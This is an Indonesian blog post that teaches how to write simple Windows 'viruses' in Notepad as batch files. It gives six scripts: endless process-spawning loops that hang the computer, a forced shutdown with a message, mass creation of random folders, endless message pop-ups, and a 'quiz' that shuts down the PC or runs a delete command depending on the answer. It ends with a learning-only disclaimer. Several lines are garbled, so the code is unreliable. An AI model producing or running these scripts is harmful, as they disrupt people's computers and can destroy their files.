Cara membuat virus sederhana dari notepad

Apakah untuk membuat suatu virus memerlukan tingkat progammer yang hebat? tentu tidak semua virus dapat dibuat dengan mudah, apalagi dengan aplikasi bawaan windows yaitu notepad.
contoh virus sederhana dari notepad adalah sebagai berikut.


1. membuat komputer menjadi hang
2. membuat komputer shutdown mengeluarkan pesan
3. terdapat file yang sangat banyak dalam suatu folder
4. membuat pesan terus menerus muncul dalam komputer
5. memaksa komputer membuka file terus menerus
6. membuat kuis dalam notepad

ok mari kita bahas satu persatu

1. membuat komputer menjadi hang
@echo off
:top
start %regedit%
/system32/microsoft.exe/
goto top
save dengan nama "open.bat"

2. membuat komputer shutdown mengeluarkan pesan
@echo off
msg *km lagi ngapain?
shutdown -s -c "error, gmn nih?
save dengan nama "mati.bat"
khusus virus yg satu ini, ada pencegahannya. yaitu dengan menulis "shutdown/a" di cmd

3. terdapat file yang sangat banyak dalam suatu folder
@echo off
:begin
md %random%
goto begin
save dengan nama "file.bat"

4. membuat pesan yang muncul terus menerus dalam komputer
@echo off
:khusus
msg *wah kenapa nih?
msg *udah bawa ke bengkel aja
msg *hahahaha
goto khusus
save dengan nama "pesan.bat"

5. memaksa komputer memaksa membuka file terus menerus

@echo off
:top
start %systemroot%
/system32/notepad.exe/
goto top

save dengan nama "awas.bat"

6.membuat kuis dalam notepad
@echo off
title kuis hari ini
:menu
cls
echo jika komputer kamu kena virus apa yang akan kamu lakukan
pause
echo pilih yang mana:
echo 1. Matiin komputer
echo 2. hapus semua file
echo 3. mukul CPU
set input=nothing
set/p input=choice:
if %input%==1 shutdown -s -t 10
if %input%==2 del c:xxx
if %input%==3 @echo off
msg* yah milih ini deh
msg* udah install ulang aja
msg *biar masalah nya kelar
@echo off
:top
start %systemroot%
system32/notepad.exe/
goto top

save dengan nama "kuis.bat"
sebenarnya sangat banyak virus virus sederhana dari notepad, saya hanya menjelaskan tentang virus yang ber ekstensi ".bat"
INGAT!!! ini hanya untuk pembelajaran saja dan diharapkan tidak untuk kejahatan
jika anda tidak kuat iman lebih baik jangan melakukan hal hal tersebut
dan jika ingin menghilangkan virus nya tinggal di RESTART aja kok
semoga artikel ini membantu anda

Related Posts:

0 Response to "Cara membuat virus sederhana dari notepad"

Post a Comment

Ketika Akan Berkomentar Sebaiknya :
1. Tidak menyisipkan link aktif ke dalam komentar
2. Apabila ingin mendapatkan backlink, gunakan OpenID
3. Berkomentar dengan baik dan sopan.
Mohon maaf apabila komentar tidak sempat saya balas karena kesibukan di dunia maya.